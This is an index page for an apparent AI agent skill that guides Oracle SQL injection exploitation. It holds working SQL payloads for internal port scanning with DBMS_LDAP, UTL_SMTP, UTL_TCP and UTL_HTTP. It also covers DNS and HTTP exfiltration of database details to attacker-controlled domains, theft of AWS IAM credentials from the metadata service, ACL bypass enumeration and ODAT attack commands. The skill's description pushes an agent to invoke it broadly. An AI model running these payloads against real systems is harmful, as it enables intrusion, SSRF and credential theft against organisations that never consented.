OpenSkillIndex← back to search

Hacktricks-skills oracle-sql-injection

Oracle SQL injection exploitation techniques for SSRF, OOB exfiltration, and internal reconnaissance. Use this skill whenever the user mentions Oracle databases, SQL injection against Oracle, DBMS packages, UTL_HTTP, UTL_TCP, DBMS_CLOUD, or needs to perform out-of-band attacks, port scanning, or metadata extraction from Oracle databases. Make sure to use this skill for any Oracle-specific injection scenarios, even if the user doesn't explicitly mention 'Oracle' but describes symptoms like ORA- error codes or PL/SQL packages.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/sql-injection/oracle-injection/SKILL.MD
source content

Oracle SQL Injection Exploitation

A comprehensive guide to exploiting Oracle SQL injection vulnerabilities for SSRF, out-of-band data exfiltration, and internal network reconnaissance.

When to Use This Skill

Use this skill when:

  • You're working with Oracle database SQL injection vulnerabilities
  • You need to perform out-of-band (OOB) attacks from Oracle
  • You want to scan internal ports or access cloud metadata services
  • You encounter Oracle-specific error codes (ORA-*) during exploitation
  • You need to exfiltrate data via DNS or HTTP from an Oracle database
  • You're dealing with Oracle 19c, 21c, 23c, or Autonomous Database

Core Attack Vectors

1. DBMS_LDAP.INIT - LDAP-based Port Scanning

The 

DBMS_LDAP.INIT
function initializes a session with an LDAP server and accepts hostname and port arguments. Useful for port scanning and DNS-based exfiltration.

Port Scanning:

SELECT DBMS_LDAP.INIT('target-host',22) FROM dual;
SELECT DBMS_LDAP.INIT('target-host',80) FROM dual;
SELECT DBMS_LDAP.INIT('target-host',8080) FROM dual;

DNS Exfiltration:

SELECT DBMS_LDAP.INIT(
  (SELECT version FROM v$instance)||'.'||
  (SELECT user FROM dual)||'.'||
  (SELECT name FROM V$database)||'.'||
  'attacker-domain.com',
  80
) FROM dual;

Error Interpretation:

  • ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.
    → Port is closed
  • Session value returned → Port is open

2. UTL_SMTP - SMTP-based Connection Testing

The 

UTL_SMTP
package can test connectivity to SMTP servers and other TCP services.

Basic Connection Test:

DECLARE c utl_smtp.connection;
BEGIN
  c := UTL_SMTP.OPEN_CONNECTION('target-host',80,2);
END;

Error Interpretation:

  • ORA-29276: transfer timeout
    → Port is open but no SMTP service
  • ORA-29278: SMTP transient error: 421 Service not available
    → Port is closed

3. UTL_TCP - Raw TCP/IP Communication

The 

UTL_TCP
package allows full control over TCP connections, enabling custom protocol interactions and cloud metadata access.

Cloud Metadata Access (AWS):

SET SERVEROUTPUT ON SIZE 30000;
DECLARE c utl_tcp.connection;
  retval pls_integer;
BEGIN
  c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
  retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
  retval := utl_tcp.write_line(c);
  BEGIN
    LOOP
      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
    END LOOP;
  EXCEPTION
    WHEN utl_tcp.end_of_input THEN
      NULL;
  END;
  utl_tcp.close_connection(c);
END;
/

Generic TCP Connection:

DECLARE c utl_tcp.connection;
  retval pls_integer;
BEGIN
  c := utl_tcp.open_connection('target-host',22,tx_timeout => 4);
  retval := utl_tcp.write_line(c);
  BEGIN
    LOOP
      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
    END LOOP;
  EXCEPTION
    WHEN utl_tcp.end_of_input THEN
      NULL;
  END;
  utl_tcp.close_connection(c);
END;
/

4. UTL_HTTP - HTTP Outbound Requests

The most common and widely documented technique for Oracle OOB attacks.

Basic HTTP Request:

SELECT UTL_HTTP.request('http://attacker-domain.com/?data=exfiltrated') FROM dual;

Cloud Metadata Access:

SELECT UTL_HTTP.request(
  'http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole'
) FROM dual;

Port Scanning via HTTP:

SELECT UTL_HTTP.request('http://target-host:22') FROM dual;
SELECT UTL_HTTP.request('http://target-host:8080') FROM dual;
SELECT UTL_HTTP.request('http://target-host:25') FROM dual;

Error Interpretation:

  • ORA-12541: TNS:no listener
    or 
    TNS:operation timed out
    → Port is closed
  • ORA-29263: HTTP protocol error
    or data returned → Port is open

5. HTTPURITYPE.GETCLOB() - Alternative HTTP Access

An alternative method using the 

HTTPURITYPE
abstract type.

Basic Usage:

SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual;

6. UTL_INADDR - DNS-based Exfiltration (Oracle 19c+)

Triggers outbound DNS lookups, useful when other network callouts are blocked.

DNS Exfiltration:

SELECT UTL_INADDR.get_host_address(
  (SELECT name FROM v$database)||'.'||
  (SELECT user FROM dual)||
  '.attacker.oob.server'
) FROM dual;

Error Interpretation:

  • Returns IP address → DNS resolution succeeded
  • ORA-29257
    → DNS resolution failed

7. DBMS_CLOUD.SEND_REQUEST - Modern Cloud HTTP Client (21c/23c/Autonomous)

A powerful HTTP client available in recent Oracle cloud editions.

Setup Credential:

BEGIN
  DBMS_CLOUD.create_credential(
    credential_name => 'NOAUTH',
    username        => 'ignored',
    password        => 'ignored'
  );
END;
/

Send Request:

DECLARE
  resp  DBMS_CLOUD_TYPES.resp;
BEGIN
  resp := DBMS_CLOUD.send_request(
    credential_name => 'NOAUTH',
    uri             => 'http://169.254.169.254/latest/meta-data/',
    method          => 'GET',
    timeout         => 3
  );
  dbms_output.put_line(DBMS_CLOUD.get_response_text(resp));
END;
/

Error Code Reference

Error CodeMeaningPort Status
ORA-31203DBMS_LDAP: PL/SQL - Init FailedClosed
ORA-29276Transfer timeoutOpen (no service)
ORA-29278SMTP transient error: 421Closed
ORA-12541TNS:no listenerClosed
ORA-29263HTTP protocol errorOpen
ORA-29257DNS resolution failedN/A
ORA-24247Network access denied by ACLBlocked by ACL

ACL Restrictions & Bypasses

Oracle tightened default Network ACLs in July 2023 CPU. Unprivileged accounts may receive 

ORA-24247: network access denied by access control list
.

Bypass Strategies:

  1. Find existing ACL entries:

    SELECT * FROM dba_network_acls;
SELECT * FROM dba_tab_privs WHERE grantee = USER;

  2. Abuse definer-rights procedures:

    SELECT owner, object_name
FROM dba_objects
WHERE object_type = 'PROCEDURE'
  AND authid = 'DEFINER';

  3. Check for DBMS_CLOUD privileges:

    SELECT * FROM user_sys_privs WHERE privilege LIKE '%CLOUD%';

Automation with ODAT

ODAT (Oracle Database Attacking Tool) automates Oracle SQL injection exploitation.

Basic Usage:

# OOB check with default credentials
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob

# Test specific modules
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules utl_http
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules utl_tcp
odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules dbms_cloud

Attack Workflow

  1. Identify the injection point - Confirm SQL injection vulnerability
  2. Test basic connectivity - Try 
    UTL_HTTP.request('http://attacker.com')
  3. Check for ACL restrictions - Look for ORA-24247 errors
  4. Enumerate available packages - Test each package systematically
  5. Perform reconnaissance - Scan internal ports, access metadata services
  6. Exfiltrate data - Use DNS or HTTP OOB channels
  7. Automate with ODAT - If manual testing confirms feasibility

Cloud Metadata Endpoints

ProviderEndpoint
AWS
http://169.254.169.254/latest/meta-data/
Azure
http://169.254.169.254/metadata/instance/
GCP
http://metadata.google.internal/computeMetadata/v1/

References